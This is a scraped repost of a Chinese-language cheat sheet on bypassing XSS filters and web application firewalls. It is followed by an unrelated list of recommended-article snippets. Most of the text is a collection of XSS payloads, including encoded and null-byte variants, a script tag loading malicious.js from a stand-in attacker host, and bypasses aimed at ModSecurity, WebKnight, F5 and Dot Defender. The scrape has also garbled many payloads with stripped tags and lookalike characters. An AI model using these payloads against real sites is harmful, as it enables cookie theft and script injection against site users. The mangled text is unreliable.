weixin_38167826
weixin_38167826

XSS插入绕过一些方式总结

详见:http://blog.csdn.net/keepxp/article/details/52054388

 

1 常规插入及其绕过

1.1 Script 标签

绕过进行一次移除操作: ipt>alert("XSS")ipt> Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本: < script src="http://attacker.org/malicious.js">

1.2 JavaScript 事件

我们可以像如下这样在元素中定义 JavaScript 事件:

这个 JavaScript 代码当有人点击它后就会被执行,同时还有其他事件如页面加载或移动鼠标都可以触发这些事件。绝大部分的时间都被过滤器所移除了,但是依旧还有少量事件没有被过滤,例如,onmouseenter 事件:当用户鼠标移动到 div 上时就会触发我们的代码。 另一个绕过的办法就是在属性和= 之间插入一个空格:

1.3 行内样式(Inlinestyle)

我们同样可以在行内样式里利用 IE 浏览器支持的动态特性:

过滤器会检查关键字 style,随后跟随的不能是 <,在随后是 expression: /style=[^<]*((expression\s*?[<]∗?)|(behavior\s*:))[^<]*(?=\>)/Uis 所以,让我们需要把 < 放到其他地方:

1.4 CSS import

IE 浏览器支持在 CSS 中扩展 JavaScript,这种技术称为动态特性(dynamic properties)。允许攻击者加载一个外部 CSS 样式表是相当危险的,因为攻击者现在可以在原始页面中执行 JavaScript 代码了。     // Works upto IE7 “location”属性 click < body οnfοcus="location='javascrpt:alert(1) >123 其他Payload < meta http-equiv="refresh"     content="0;url=//goo.gl/nlX0P"> < meta http-equiv="refresh"     content="0;javascript:alert(1)"/> < svg xmlns="http://www.w3.org/2000/svg"> //     By @secalert < svg xmlns:xlink=" r=100 /> // By Mario < svg>     // By @secalert < meta content=" 1 ;JAVASCRIPT:alert(1)" http-equiv="refresh"/> < math>click // ByAshar Javed ();:被过滤     // Works With All Browsers ( is html encoded to (  ) is html encoded to ) Opera的变量 实体解码 </script><script>alert(1)</script> < a href="j&#x26#x41;vascript:alert%252831337%2529">Hello 编码 JavaScript是很灵活的语言,可以使用十六进制、Unicode、HTML等进行编码,以下属性可以被编码 (支持HTML, Octal, Decimal,Hexadecimal, and Unicode) href= action= formaction= location= on*= name= background= poster= src= code= data= //只支持base64

 

2.4 基于上下文的过滤

WAF最大的问题是不能理解内容,使用黑名单可以阻挡独立的js脚本,但仍不能对xss提供足够的保护,如果一个反射型的XSS是下面这种形式

2.4.1 输入反射属性

我们可以使用 “>触发,但是如果<>被过滤,我们仍然可以使用“ autofocusοnfοcus=alert(1)//触发,基本是使用“ 关闭value属性,再加入我们的执行脚本 " οnmοuseοver="prompt(0) x=" " οnfοcusin=alert(1)     autofocus x=" " οnfοcusοut=alert(1)     autofocus x=" " οnblur=alert(1) autofocus     a=" 输入反射在,闭合前面的标签,然而在这种情况,我们也可以直接输入执行脚本alert(), prompt() confirm() ,例如: “;alert(1)//

2.4.2 非常规事件监听

DOMfocusin,DOMfocusout,等事件,这些需要特定的事件监听适当的执行。例如: ";document.body.addEventListener("DOMActivate",alert(1))// ";document.body.addEventListener("DOMActivate",prompt(1))// ";document.body.addEventListener("DOMActivate",confirm(1))// 此类事件的列表 DOMAttrModified DOMCharacterDataModified DOMFocusIn DOMFocusOut DOMMouseScroll DOMNodeInserted DOMNodeInsertedIntoDocument DOMNodeRemoved DOMNodeRemovedFromDocument DOMSubtreeModified

2.4.3 超文本内容

代码中的情况如下 Click 可以使用javascript:alert(1)//直接执行Click

2.4.4 变形

主要包含大小写和JavaScript变形 javascript:alert(1) javaSCRIPT:alert(1) JaVaScRipT:alert(1) javas cript:\u0061lert(1); javascript:\u0061lert(1) avascript:alert(document.cookie)     // AsharJaved IE10以下和URI中可以使用VBScript vbscript:alert(1); vbscript:alert(1); vbscr ipt:alert(1)" Data URl data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

2.4.5JSON内容

反射输入 encodeURIComponent('userinput') 可以使用 -alert(1)- -prompt(1)- -confirm(1)- 结果 encodeURIComponent(''-alert(1)-'') encodeURIComponent(''-prompt(1)-'')

2.4.6 输入反射在svg标签内

源码如下: 可以输入 www.site.com/test.php?var=text”;alert(1)// 如果系统编码了”字符 原因是引入了附加的(XML)到HTML内容里,可以使用2次编码处理 浏览器BUG

2.4.7 字符集BUG

字符集BUG在IE中很普遍,最早的bug是UTF-7。如果能控制字符集编码,我们可以绕过99% 的WAF过滤。 示例 http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS 可以控制编码,提交 http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”> 可以修改为UTF-32编码形式 ???script?alert(1)?/script? http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

2.4.8 空字节

最长用来绕过mod_security防火墙,形式如下: alert(1); < scri\x00pt>alert(1); < s%00c%00r%00%00ip%00t>confirm(0); 空字节只适用于PHP 5.3.8以上的版本

2.4.9 语法BUG

RFC声明中节点名称不能是空格,以下的形式在javascript中不能运行 < %0ascript>alert(1); < %0bscript>alert(1); < %, // Works upto IE7 参考http://html5sec.org/#71 < !--[if]> // Worksupto IE9 参考http://html5sec.org/#115 < ?xml-stylesheet     type="text/css"?> // Works in IE7 参考http://html5sec.org/#77 < %div%20style=xss:expression(prompt(1))>     // Works Upto IE7

2.4.10Unicode分隔符

[on\w+\s*]这个规则过滤了所有on事件,为了验证每个浏览器中有效的分隔符,可以使用fuzzing方法测试0×00到0xff,结果如下: IExplorer=     [0x09,0x0B,0x0C,0x20,0x3B] Chrome =     [0x09,0x20,0x28,0x2C,0x3B] Safari = [0x2C,0x3B] FireFox=     [0x09,0x20,0x28,0x2C,0x3B] Opera = [0x09,0x20,0x2C,0x3B] Android =     [0x09,0x20,0x28,0x2C,0x3B] x0b在Mod_security中已经被过滤,绕过的方法: rhainfosec

2.4.11缺少X-frame选项

通常会认为X-frame是用来防护点击劫持的配置,其实也可以防护使用iframe引用的xss漏洞 Docmodes IE引入了doc-mode很长时间,提供给老版本浏览器的后端兼容性,有风险,攻击情景是黑客可以引用你站点的框架,他可以引入doc-mode执行css表达式 expression(open(alert(1))) 以下POC可以插入到IE7中                    

2.4.12Window.name欺骗

情景:我们用iframe加载一个页面,我们可以控制窗口的名称,这里也可以执行javascript代码 POC < iframesrc='http://www.target.com?foo="xss autofocus/AAAAA  οnfοcus=location=window.name//' name="javascript:alert("XSS")"> DOM型XSS 服务器不支持过滤DOM型的XSS,因为DOM型XSS总是在客户端执行,看一个例子: 在一些情况下,反射型XSS可以转换成DOM型XSS: http://www.target.com/xss.php?foo=

2.4.13ModSecurity绕过

confirm(0); < a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>rhainfosec 参考http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html

2.4.14WEB KNIGHT绕过

< marquee/onstart=confirm(2)> F5 BIG IP ASM and Palo ALTO绕过

//IE6或者低版本Opera     “/>a Dot Defender绕过   < isindex action="javas&tab;cript:alert(1)" type=image>

 

3结论

黑名单方式永远不是最好的解决办法,但是相对与白名单效率很高,对于WAF供应商来说,最好的实践如下: 3.1开发者和管理员要注意WAF只能缓解攻击,并且针对已知的弱点的防护只是和源代码修复的方法打个时间差; 3.2要保持WAF的规则库更新; 3.3 WAF可以配置参数限制,需要提供手册用于配置参数content-length最大最小长度,content-type类型,在入侵时进行告警;

3.4如果WAF依据黑名单,要确保可以阻断已知的浏览器BUG,并且相应规则库要及时更新。

 

转载于:https://www.cnblogs.com/nuomin/p/7549854.html

你可能感兴趣的:(XSS插入绕过一些方式总结)

  • 【Node.js】模块分类与 `require` 用法详解 Peter-Lu #NodeJSnode.jsjavascript前端
    文章目录一、Node.js模块概述1.模块的定义2.模块的作用二、Node.js模块的分类1.核心模块2.文件模块3.第三方模块4.全局模块三、`require`的用法详解1.`require`的基本用法2.模块导出机制3.模块的缓存机制4.`require`的动态引入四、模块的实际应用场景1.项目结构优化2.复用代码五、总结Node.js是一个强大的JavaScript运行环境,广泛应用于服务器
  • Node.js 模块化概念详细介绍 还是鼠鼠 node.jsnode.jswebjavascriptvscode前端
    目录模块化的概念模块化的好处:实现模块化代码实现1.创建计算器模块2.使用计算器模块3.运行结果总结常见的Node.js核心模块模块化的应用场景Node.js采用了模块化的设计,使得开发者能够将代码拆分成多个独立的模块,便于维护和复用。在Node.js中,每个文件都可以视为一个模块,并且可以通过require()函数引入其他模块的功能。模块化提高了代码的可维护性,减少了冗余代码,并提高了开发效率。
  • UI自动化测试之CSS Selector 定位秘籍:解锁 WEB UI 自动化测试的高效之道 做测试的小薄 测试进阶cssseleniumUI自动化测试元素定位方式
    在WebUI自动化测试中,元素定位是实现自动化操作的核心步骤。SeleniumWebDriver提供了多种元素定位方式,其中CSSSelector是一种功能强大且灵活的定位方法。它基于CSS选择器语法,能够快速、精准地定位目标元素,尤其适用于复杂的DOM结构。本文将深入解析CSSSelector的工作原理、使用技巧以及需要注意的事项,帮助你在自动化测试中更高效地运用这一工具。一、CSSSelect
  • JVM GC四大算法 coding_-_半生 jvm算法java
    JVMGC四大算法文章目录JVMGC四大算法GC四大算法一、引用计数法二、复制算法(COPY)三、标记清除算法(MARK-SWEEP)四、标记整理算法(MARK-COMPACT)五、总结GC四大算法一、引用计数法描述:给每一个对象分配一个计数器,用于记录对象是否被引用,被引用一次,计数进行+1优点:方便直接判断对象是否能够回收缺点:使用计数器需要消耗一定的内存,且每一次计数的修改同样需要消耗内存致
  • 通信之PDH准同步数字系列 玖Yee 信息与通信
    PDH-准同步数字系列(PlesiochronousDigitalHierarchy):是数字通信系统中的一种数字传输系列,采用在数字通信网的每个节点上都分别设置高精度时钟的方式,这些时钟信号有统一标准速率,但各时钟间存在微小差别,并非真正的同步,所以叫“准同步”。速率等级两大体系三个标准:国际上PDH有两大系列三个标准。以欧洲系列为例,各次群容纳的E1数量呈4倍关系,比如可将4个2Mbit/s复
  • 【CSS 面经】元素的层叠顺序 Peter-Lu #CSS面经css前端htmlecmascriptjavascript
    文章目录一、层叠顺序的基本概念1.视觉层叠2.默认层叠顺序二、如何控制元素的层叠顺序?1.`z-index`属性示例:使用`z-index`控制元素层叠顺序2.`position`属性与层叠顺序示例:不同`position`设置下的层叠顺序3.`z-index`和堆叠上下文示例:堆叠上下文三、总结在网页设计中,元素的层叠顺序(StackingOrder)是指在同一页面上,多个元素如何相互叠加的规则
  • Spring Data JPA Vic2334 JAVASpringspring后端java开源
    SpringDataJPA什么是JPA?相同处:1.都跟数据库操作有关,JPA是jdbc的升华,升级版。2.JDBC和JPA都是一组规范1接口。3.都是由SUN公司推出的不同处:1.JDBC是有各个关系型数据库实现的,JPA是有ORM框架实现。2.JDBC使用SQL语句和数据库通信,JPA用面向对象方式,通过ORM框架生成SQL,进行操作。3.JPA在JDBC之上,JPA也要依赖JDBC才能操作数
  • js实现关于分页的一种实现方式 番薯(Koali) Javajavaweb分页数据javascript
    项目中用到列表的地方很多,二页面列表的显示必然要求分页,所以分页和查询几乎密不可分,如果说你不会分页查询数据,那你基本上还属于菜鸟。分页的原理很简单,从sql上看就是从哪一条开始,往后差几条。所以sql只需要传2个参数,这只是原理罢了,关键是实现。而实现的方法就多了去了,架构师干这个是小菜一碟。在我的项目中,关于分页架构师已经写好了一个管理分页的类,这个类与sql耦合,控制分页只需哟啊控制这个类的
  • Flask实现分页的三种方法 BirdMan98 FlaskPythonMySQLflask数据库python
    在Flask中实现分页的方式有多种,最常用的是使用Flask-SQLAlchemy自带的分页功能,或者手动实现分页逻辑。下面介绍几种方法:方法1:使用Flask-SQLAlchemy的paginate()Flask-SQLAlchemy提供了paginate()方法,可以轻松实现分页。1.安装Flask-SQLAlchemypipinstallflaskflask-sqlalchemy2.代码示例
  • sql获取某列出现频次最多的值_业务硬核SQL集锦 金渡江 sql获取某列出现频次最多的值
    戳上方蓝字关注我这两年学会了跑sql,当时有很多同学帮助我精进了这个技能,现在也写成一个小教程,反馈给大家。适用对象:工作中能接触到sql查询平台的业务同学(例如有数据查询权限的产品与运营同学)适用场景:查询hive&mysql上的数据文档优势:比起各类从零起步的教程教材,理解门槛低,有效信息密度大,可以覆盖高频业务场景。文末有一些常见的小技巧,希望帮助同学们提升工作效率。SQL的基础结构:做一个
  • Windows C盘清理技巧分享 qzw1210 windows
    清理C盘是保持计算机性能和存储空间的关键步骤。C盘通常是系统盘,存储着操作系统和许多重要的系统文件,因此在清理时需要格外小心,以免误删重要文件。以下是一些详细的C盘清理技巧,帮助你有效释放空间。1.使用磁盘清理工具Windows自带的磁盘清理工具是清理C盘的首选工具。它可以安全地删除不必要的系统文件。步骤:打开“此电脑”。右键点击C盘,选择“属性”。点击“磁盘清理”按钮。在弹出的窗口中,选择要删除
  • python:数据类构建器 愚戏师 python基础与机器学习pythonwindows开发语言
    在Python中,数据类(DataClasses)用于快速创建主要目的是存储数据的类,自动生成__init__,__repr__,__eq__等方法。“Python提供了几种构建简单类的方式,这些类只是字段的容器,几乎没有额外功能。这种模式称为“数据类”(dataclass),dataclasses包就支持该模式。”引用自《流畅的python(第二版)》1.基础数据类使用@dataclass装饰器
  • 【matlab代码】基于RSSI的wifi定位例程(三维空间,自适应基站的数量) MATLAB卡尔曼 定位与导航1024程序员节matlab开发语言定位导航蓝牙
    文章目录程序概述程序运行运行方法运行结果代码各模块的功能源代码总结程序概述该程序基于RSSI(接收信号强度指示)原理实现Wi-Fi定位,适用于在三维空间中定位未知点。程序通过多个锚点(基站)测量信号强度,并计算目标点的位置。程序使用以下公式进行位置计算:路径损耗模型公式:RSSI=A−10nlog⁡10(d)RSSI=A-10n\log_{10}(d)RSSI=A−10nlog10(d)其中:RS
  • Elasticsearch大文件检索性能提升20倍实践(干货)_elasticsearch 查询优化 2401_84247505 2024年程序员学习elasticsearchjenkins大数据
    3、问题排查与定位步骤1:限定返回记录条数。不提供直接访问末页的入口。baidu,360,搜狗等搜索引擎都不提供访问末页的请求方式。都是基于如下的请求方式:通过点击上一下、下一页逐页访问。这个从用户的角度也很好理解,搜索引擎返回的前面都是相关度最高的,也是用户最关心的信息。Elasticsearch的默认支持的数据条数是10000条,可以通过post请求修改。最终,本步骤将支持ES最大返回值100
  • 明基PD2700U显示器无法调节图像模式 橘子西瓜 显示器PD2700U明基BENQ
    现象:明基PD2700U显示器无法调节图像模式,如下图:目前未找到根本原因,推测可能是下面的原因:1、安装了远程桌面软件:向日葵、虚拟显示器2、显卡插入了接口,但是没接显示器解决办法:电脑接入两个显示器,按Windows+P,切到其它模式,然后再切回来:然后就可以了:
  • 还不会构建MindIE镜像?一篇文章搞定 Zain Lau vim编辑器linuxMindIE昇腾
    MindIE镜像构建工程项目简介用于构建多平台/架构的MindiE镜像的脚本。用户可以根据需要准备好所需的软件包,修改相关配置并构建镜像。前提条件网络连接在整个构建过程中,必须保持稳定的网络连接。此构建工程依赖于在线下载多个资源,包括但不限于Python源码、编译工具以及各种依赖,无法离线构建。Docker推荐版本:Docker20.10.x及以上最低版本要求:Docker19.03.x安装方式:
  • Android StrictMode 使用与原理深度解析 伟江.Zeng Android基础androidStrictMode性能优化内存泄漏代码规范耗时检测kotlin
    AndroidStrictMode是Android系统提供的一种开发者工具,用于检测应用主线程中不合理的耗时操作(如磁盘I/O、网络请求等)和内存泄漏问题。通过配置策略和惩罚机制,它帮助开发者在早期发现潜在性能问题,提升应用流畅性。以下从使用方式和实现原理两方面进行深度解析。一、StrictMode使用详解1.基础配置在Application或Activity的onCreate()中初始化Stri
  • MATLAB算法实战应用案例精讲-【深度学习】归一化 林聪木 matlab算法深度学习
    目录为什么要做特征归一化/标准化?常用featurescaling方法计算方式上对比分析featurescaling需要还是不需要什么时候需要featurescaling?什么时候不需要FeatureScaling?归一化基础知识点1.什么是归一化2.为什么要归一化3.为什么归一化能提高求解最优解的速度4.归一化有哪些类型5.不同归一化的使用条件6.归一化和标准化的联系与区别层归一化综述提出背景概
  • 顺序表和链表的比较 数九天有一个秘密 链表数据结构算法
    这两个结构各有优势,相辅相成。顺序表:优点:1.支持随机访问。2.CPU高速缓存命中率更高。(物理空间连续)缺点:1.头部和中部插入和删除时间效率低(O(n))。2.连续的物理空间,空间不够后需要增容:a.增容有一定程度的消耗。b.为了避免频繁的进行增容,我们一般都按照倍数去增容,用不完会有一定的空间浪费。链表(带头循环双链表)优点:1.任意位置插入删除效率高(O(n))。2.按需申请和释放空间。
  • DeepSeek:全栈开发者视角下的AI革命者 大富大贵7 程序员知识储备1程序员知识储备2程序员知识储备3人工智能
    DeepSeek:全栈开发者视角下的AI革命者写在前面随着人工智能(AI)技术的不断进步,AI已经成为各行各业创新的核心动力。从自动驾驶到智能制造,再到自然语言处理和图像识别,AI正在逐渐渗透并改变着我们的生活和工作方式。DeepSeek,作为AI领域的新兴技术,凭借其独特的技术架构和颠覆性的创新理念,成为了全栈开发者关注的焦点。本文将从全栈开发者的角度出发,详细解析DeepSeek的诞生、技术架
  • 【Gee】项目总结:模仿 GIN 实现简单的 Golang Web 框架 YGGP GolangProjectgolang
    文章目录Gee项目回顾Gee项目总结Golang已经具备基础的web功能,为什么还需要web框架?作为web框架,Gee框架完成了哪些功能?如何用Gee来构建web项目?Gee项目回顾上个月月末我按照Geektutu的教程,实现了Gee这个基于Golang的简单Web框架,但是一直没有进行复盘总结。学习Gee的八篇文章的链接如下:【Gee】7天用Go从零实现Web框架Gee【Gee】Day1:HT
  • 操作符详解 知困勉行的Allen c语言学习方法c++
    今天给小伙伴们分享一些关于操作符的知识~文章将会介绍各种操作符以及它们的使用示例。OK,那就让咱们进入正题吧@目录一.操作符分类二.各类操作符介绍1.算数操作符2.移位操作符3.位操作符4.1赋值操作符4.2复合赋值符5.单目操作符6.关系操作符7.逻辑操作符8.条件操作符9.逗号表达式10.下标引用、函数调用和结构成员三.结语一.操作符分类操作符的种类还挺多嘞~可分为:算术操作符移位操作符位操作
  • Assembly语言的自然语言处理 花韵婷 包罗万象golang开发语言后端
    Assembly语言在自然语言处理中的应用引言自然语言处理(NaturalLanguageProcessing,NLP)作为人工智能的一个重要分支,致力于实现计算机与人类语言之间的互动。随着计算能力的提升以及大数据的蓬勃发展,NLP在各个领域的应用如火如荼。从语音识别、机器翻译到情感分析等,NLP正在改变我们与信息之间的互动方式。不过,当前主流的NLP研究通常是用高级编程语言(如Python、Ja
  • Scala语言的硬件驱动 花韵婷 包罗万象golang开发语言后端
    使用Scala语言进行硬件驱动开发引言随着计算机技术的快速发展,硬件设备的交互和控制在现代应用中显得尤为重要。大多数硬件驱动程序都用C或C++编写,但随着Scala语言的流行及其在数据处理和并发编程中的优势,越来越多的开发者开始探讨利用Scala进行硬件驱动开发的可能性。本文将深入探讨Scala语言在硬件驱动开发中的应用、优势、以及一些实际案例。什么是硬件驱动硬件驱动(DeviceDriver)是
  • Certbot实现SSL免费证书自动续签(CentOS 7版 + Docker部署的nginx) 程序猿S先森丶 sslcentosdocker
    前置安装,可参考Certbot实现SSL免费证书自动续签(CentOS7+nginx/apache)如果是通过Docker运行Nginx,certbot无法直接检测到本地的Nginx配置。解决方案是使用standalone模式或挂载Webroot方式获取SSL证书,并手动配置Nginx。方案1:Standalone模式(临时关闭Nginx获取证书)如果你的服务器不支持Webroot(或Nginx配
  • 云计算、边缘计算与雾计算 白小白呀 笔记大数据
    云计算(数据上传到云端进行处理)云计算(CloudComputing)是一种基于互联网的计算方式,通过这种方式,共享的软硬件资源和信息可以按需提供给计算机和其他设备。通俗的讲,云是网络、互联网的一种比喻说法,即互联网与建立互联网所需要的底层基础设施的抽象体。“计算”指的是一台足够强大的计算机提供的计算服务(包括各种功能,资源,存储)。“云计算”可以理解为:通过互联网可以使用足够强大的计算机为用户提
  • Tornado 初识 Wu_Candy Web服务器
    一、什么是tornadoTornado是使用Python编写的一个强大的、可扩展的Web服务器。它在处理严峻的网络流量时表现得足够强健,但却在创建和编写时有着足够的轻量级,并能够被用在大量的应用和工具中。二、tornado有什么优势Tornado和现在的主流baiduWeb服务器框架(包括大多数Python的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快,得利于其非阻塞的方式和对epol
  • SSL的原理和应用 m0_74092749 ssl网络协议网络
    前言:SSL协议便是Internet上应用最为广泛的网络数据安全传输协议。SSL协议隶属于会话层,处于有连接的会话层之上,它一经产生就在Internet领域发挥了它的巨大作用。目前,国外著名的商用浏览器和Web服务器都支持SSL协议,SSL已成为最流行的WWW安全协议。目前已经有若干国外厂商推出了基于SSL的安全产品,但是协议在核心密码算法上都有出口限制,大多采用一些低安全强度的算法,而且协议代码
  • 详解PriorityQueue 27xixi 算法数据结构java
    PriorityQueue是Java集合框架中的一个类,它实现了优先级队列的数据结构。优先级队列是一种特殊的队列,其中的元素按照优先级顺序出队,而不是按照插入顺序(FIFO)。默认情况下,PriorityQueue是一个最小堆,即优先级最小的元素最先出队。1.PriorityQueue的特点基于堆实现:PriorityQueue通常基于二叉堆(最小堆或最大堆)实现。无界队列:PriorityQue
  • java Stream API中的聚合操作 27xixi javajava18
    聚合操作是指对一组数据进行处理,最终生成一个单一的结果。在编程中,聚合操作通常用于对集合(如列表、数组等)中的元素进行统计、计算或汇总。常见的聚合操作包括求和、求平均值、查找最大值/最小值、计数等。在Java的StreamAPI中,聚合操作是通过终端操作(TerminalOperations)来实现的。以下是一些常见的聚合操作及其用法:1.求和(Sum)对集合中的元素进行求和。示例:求整数列表的和
  • Enum 枚举 120153216 enum枚举
    原文地址:http://www.cnblogs.com/Kavlez/p/4268601.html Enumeration 于Java 1.5增加的enum type...enum type是由一组固定的常量组成的类型,比如四个季节、扑克花色。在出现enum type之前,通常用一组int常量表示枚举类型。比如这样: public static final int APPLE_FUJI = 0
  • Java8简明教程 bijian1013 javajdk1.8
            Java 8已于2014年3月18日正式发布了,新版本带来了诸多改进,包括Lambda表达式、Streams、日期时间API等等。本文就带你领略Java 8的全新特性。  一.允许在接口中有默认方法实现         Java 8 允许我们使用default关键字,为接口声明添
  • Oracle表维护 快速备份删除数据 cuisuqiang oracle索引快速备份删除
    我知道oracle表分区,不过那是数据库设计阶段的事情,目前是远水解不了近渴。 当前的数据库表,要求保留一个月数据,且表存在大量录入更新,不存在程序删除。 为了解决频繁查询和更新的瓶颈,我在oracle内根据需要创建了索引。但是随着数据量的增加,一个半月数据就要超千万,此时就算有索引,对高并发的查询和更新来说,让然有所拖累。 为了解决这个问题,我一般一个月会进行一次数据库维护,主要工作就是备
  • java多态内存分析 麦田的设计者 java内存分析多态原理接口和抽象类
          “  时针如果可以回头,熟悉那张脸,重温嬉戏这乐园,墙壁的松脱涂鸦已经褪色才明白存在的价值归于记忆。街角小店尚存在吗?这大时代会不会牵挂,过去现在花开怎么会等待。       但有种意外不管痛不痛都有伤害,光阴远远离开,那笑声徘徊与脑海。但这一秒可笑不再可爱,当天心
  • Xshell实现Windows上传文件到Linux主机 被触发 windows
    经常有这样的需求,我们在Windows下载的软件包,如何上传到远程Linux主机上?还有如何从Linux主机下载软件包到Windows下;之前我的做法现在看来好笨好繁琐,不过也达到了目的,笨人有本方法嘛; 我是怎么操作的: 1、打开一台本地Linux虚拟机,使用mount 挂载Windows的共享文件夹到Linux上,然后拷贝数据到Linux虚拟机里面;(经常第一步都不顺利,无法挂载Windo
  • 类的加载ClassLoader 肆无忌惮_ ClassLoader
    类加载器ClassLoader是用来将java的类加载到虚拟机中,类加载器负责读取class字节文件到内存中,并将它转为Class的对象(类对象),通过此实例的 newInstance()方法就可以创建出该类的一个对象。   其中重要的方法为findClass(String name)。   如何写一个自己的类加载器呢? 首先写一个便于测试的类Student
  • html5写的玫瑰花 知了ing html5
    <html> <head> <title>I Love You!</title> <meta charset="utf-8" /> </head> <body> <canvas id="c"></canvas>
  • google的ConcurrentLinkedHashmap源代码解析 矮蛋蛋 LRU
    原文地址: http://janeky.iteye.com/blog/1534352 简述 ConcurrentLinkedHashMap 是google团队提供的一个容器。它有什么用呢?其实它本身是对 ConcurrentHashMap的封装,可以用来实现一个基于LRU策略的缓存。详细介绍可以参见 http://code.google.com/p/concurrentlinke
  • webservice获取访问服务的ip地址 alleni123 webservice
    1. 首先注入javax.xml.ws.WebServiceContext, @Resource private WebServiceContext context; 2. 在方法中获取交换请求的对象。 javax.xml.ws.handler.MessageContext mc=context.getMessageContext(); com.sun.net.http
  • 菜鸟的java基础提升之道——————>是否值得拥有 百合不是茶
    1,c++,java是面向对象编程的语言,将万事万物都看成是对象;java做一件事情关注的是人物,java是c++继承过来的,java没有直接更改地址的权限但是可以通过引用来传值操作地址,java也没有c++中繁琐的操作,java以其优越的可移植型,平台的安全型,高效性赢得了广泛的认同,全世界越来越多的人去学习java,我也是其中的一员      java组成:
  • 通过修改Linux服务自动启动指定应用程序 bijian1013 linux
    Linux中修改系统服务的命令是chkconfig (check config),命令的详细解释如下: chkconfig 功能说明:检查,设置系统的各种服务。 语  法:chkconfig [ -- add][ -- del][ -- list][系统服务] 或 chkconfig [ -- level  <</SPAN>
  • spring拦截器的一个简单实例 bijian1013 javaspring拦截器Interceptor
    Purview接口 package aop; public interface Purview { void checkLogin(); } Purview接口的实现类PurviesImpl.java package aop; public class PurviewImpl implements Purview { public void check
  • [Velocity二]自定义Velocity指令 bit1129 velocity
    什么是Velocity指令 在Velocity中,#set,#if, #foreach, #elseif, #parse等,以#开头的称之为指令,Velocity内置的这些指令可以用来做赋值,条件判断,循环控制等脚本语言必备的逻辑控制等语句,Velocity的指令是可扩展的,即用户可以根据实际的需要自定义Velocity指令   自定义指令(Directive)的一般步骤 &nbs
  • 【Hive十】Programming Hive学习笔记 bit1129 programming
    第二章 Getting Started 1.Hive最大的局限性是什么?一是不支持行级别的增删改(insert, delete, update)二是查询性能非常差(基于Hadoop MapReduce),不适合延迟小的交互式任务三是不支持事务2. Hive MetaStore是干什么的?Hive persists table schemas and other system metadata.
  • nginx有选择性进行限制 ronin47 nginx 动静 限制
    http { limit_conn_zone $binary_remote_addr zone=addr:10m; limit_req_zone $binary_remote_addr zone=one:10m rate=5r/s;... server {... location ~.*\.(gif|png|css|js|icon)$ {
  • java-4.-在二元树中找出和为某一值的所有路径 . bylijinnan java
    /* * 0.use a TwoWayLinkedList to store the path.when the node can't be path,you should/can delete it. * 1.curSum==exceptedSum:if the lastNode is TreeNode,printPath();delete the node otherwise
  • Netty学习笔记 bylijinnan javanetty
    本文是阅读以下两篇文章时: http://seeallhearall.blogspot.com/2012/05/netty-tutorial-part-1-introduction-to.html http://seeallhearall.blogspot.com/2012/06/netty-tutorial-part-15-on-channel.html 我的一些笔记 ===
  • js获取项目路径 cngolon js
    //js获取项目根路径,如: http://localhost:8083/uimcardprj function getRootPath(){     //获取当前网址,如: http://localhost:8083/uimcardprj/share/meun.jsp     var curWwwPath=window.document.locati
  • oracle 的性能优化 cuishikuan oracleSQL Server
       在网上搜索了一些Oracle性能优化的文章,为了更加深层次的巩固[边写边记],也为了可以随时查看,所以发表这篇文章。     1.ORACLE采用自下而上的顺序解析WHERE子句,根据这个原理,表之间的连接必须写在其他WHERE条件之前,那些可以过滤掉最大数量记录的条件必须写在WHERE子句的末尾。(这点本人曾经做过实例验证过,的确如此哦!
  • Shell变量和数组使用详解 daizj linuxshell变量数组
    Shell 变量 定义变量时,变量名不加美元符号($,PHP语言中变量需要),如: your_name="w3cschool.cc" 注意,变量名和等号之间不能有空格,这可能和你熟悉的所有编程语言都不一样。同时,变量名的命名须遵循如下规则: 首个字符必须为字母(a-z,A-Z)。 中间不能有空格,可以使用下划线(_)。 不能使用标点符号。 不能使用ba
  • 编程中的一些概念,KISS、DRY、MVC、OOP、REST dcj3sjt126com REST
    KISS、DRY、MVC、OOP、REST (1)KISS是指Keep It Simple,Stupid(摘自wikipedia),指设计时要坚持简约原则,避免不必要的复杂化。 (2)DRY是指Don't Repeat Yourself(摘自wikipedia),特指在程序设计以及计算中避免重复代码,因为这样会降低灵活性、简洁性,并且可能导致代码之间的矛盾。 (3)OOP 即Object-Orie
  • [Android]设置Activity为全屏显示的两种方法 dcj3sjt126com Activity
    1. 方法1:AndroidManifest.xml 里,Activity的 android:theme  指定为" @android:style/Theme.NoTitleBar.Fullscreen" 示例:   <application      
  • solrcloud 部署方式比较 eksliang solrCloud
    solrcloud 的部署其实有两种方式可选,那么我们在实践开发中应该怎样选择呢? 第一种:当启动solr服务器时,内嵌的启动一个Zookeeper服务器,然后将这些内嵌的Zookeeper服务器组成一个集群。  第二种:将Zookeeper服务器独立的配置一个集群,然后将solr交给Zookeeper进行管理   谈谈第一种:每启动一个solr服务器就内嵌的启动一个Zoo
  • Java synchronized关键字详解 gqdy365 synchronized
    转载自:http://www.cnblogs.com/mengdd/archive/2013/02/16/2913806.html 多线程的同步机制对资源进行加锁,使得在同一个时间,只有一个线程可以进行操作,同步用以解决多个线程同时访问时可能出现的问题。 同步机制可以使用synchronized关键字实现。 当synchronized关键字修饰一个方法的时候,该方法叫做同步方法。 当s
  • js实现登录时记住用户名 hw1287789687 记住我记住密码cookie记住用户名记住账号
    在页面中如何获取cookie值呢? 如果是JSP的话,可以通过servlet的对象request 获取cookie,可以 参考:http://hw1287789687.iteye.com/blog/2050040 如果要求登录页面是html呢?html页面中如何获取cookie呢? 直接上代码了 页面:loginInput.html 代码: <!DOCTYPE html PUB
  • 开发者必备的 Chrome 扩展 justjavac chrome
    Firebug:不用多介绍了吧https://chrome.google.com/webstore/detail/bmagokdooijbeehmkpknfglimnifench ChromeSnifferPlus:Chrome 探测器,可以探测正在使用的开源软件或者 js 类库https://chrome.google.com/webstore/detail/chrome-sniffer-pl
  • 算法机试题 李亚飞 java算法机试题
